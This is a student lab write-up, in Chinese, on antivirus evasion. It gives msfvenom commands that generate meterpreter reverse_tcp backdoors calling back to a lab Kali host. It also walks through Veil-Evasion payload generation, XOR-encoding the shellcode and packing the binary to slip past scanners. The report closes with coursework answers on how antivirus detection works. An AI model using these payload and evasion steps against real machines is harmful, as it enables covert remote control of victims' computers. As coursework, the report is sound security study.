20155220 網絡攻防技術 實驗三 免殺原理與實踐

網絡攻防技術 實驗三 免殺原理與實踐

使用msf生成後門程序的檢測

• 首先咱們對上次實驗生成的後門exe，利用VirSCAN進行檢測

• 而後咱們利用msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.150.138（kali ip） lport=5220 x> 5220_backjar.jar，
  生成jar文件，進行檢測。

使用veil-evasion生成反彈連接的可執行文件

• 首先咱們先對veil-evasion進行安裝，詳情可參考老師博客

• 安裝好以後，咱們利用veil，指令打開veil-evasion

• 依次用use evasion，list payloads，進入到payloads模板界面

• 隨便選擇一個模板，將其複製，而後輸入use 5（你所複製的模板）

• 而後輸入set LHOST kali-ip，set LPORT 5220對其進行配置，而後輸入generate，生成。

利用shellcode編程實現免殺

• 首先咱們輸入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.150.138 LPORT=443 -f c

• 根據老師所給的，將其變成C語言文件，進行編譯

• 進行回連，回連成功

對shellcode進行更改

• 我首先對其進行異或，我作的爲異或0x83

• 回連成功
  
  

• 進行檢測，如圖

加殼

加殼後我發現了加殼後的病毒文件較以前未加殼更容易被查殺，但我發現了其中有的殺毒軟件在病毒文件加殼後反而未能識別出來，而加殼後有些新的殺毒軟件反而可以識別了，這我就不知所因了。

基礎問題

• 1.殺軟是如何檢測出惡意代碼的？

  • 基於特徵碼的檢測：殺毒軟件的病毒庫記錄了一些惡意軟件的特徵碼，這些特徵碼由一個不大於64字節的特徵串組成，根據已檢測出或網絡上公佈的病毒，對其提取特徵碼，記錄成病毒庫，檢測到程序時將程序與特徵碼比對便可判斷是不是惡意代碼。

  • .基於行爲的惡意軟件檢測：在程序運行的狀態下（動態）對其行爲進行監控，若是有敏感行爲會被認爲是惡意程序，是一種動態的監測與捕捉。

• 2.免殺是作什麼？

  • 免殺是將二進制碼隱藏，或者變形

• 3.免殺的基本方法有哪些？

  • 改變特徵碼

  • 對exe可執行文件加殼：壓縮殼 加密殼

  • 基於payload從新編譯生成可執行文件

    實踐總結與體會

    本次實驗過程頗爲曲折，首先在下載veil過程當中沒法安裝，再三嘗試後只得拷了一個虛擬機； 而後對shellcode代碼更改後，回連出現了失敗，在組長的指導下順利解決了該問題。 經過本次實驗，忽然發現稍稍修改病毒就能夠騙過好多殺毒軟件，讓我對如今電腦的安全性有了從新的審視； 最後我仍是趕忙去給電腦殺毒了。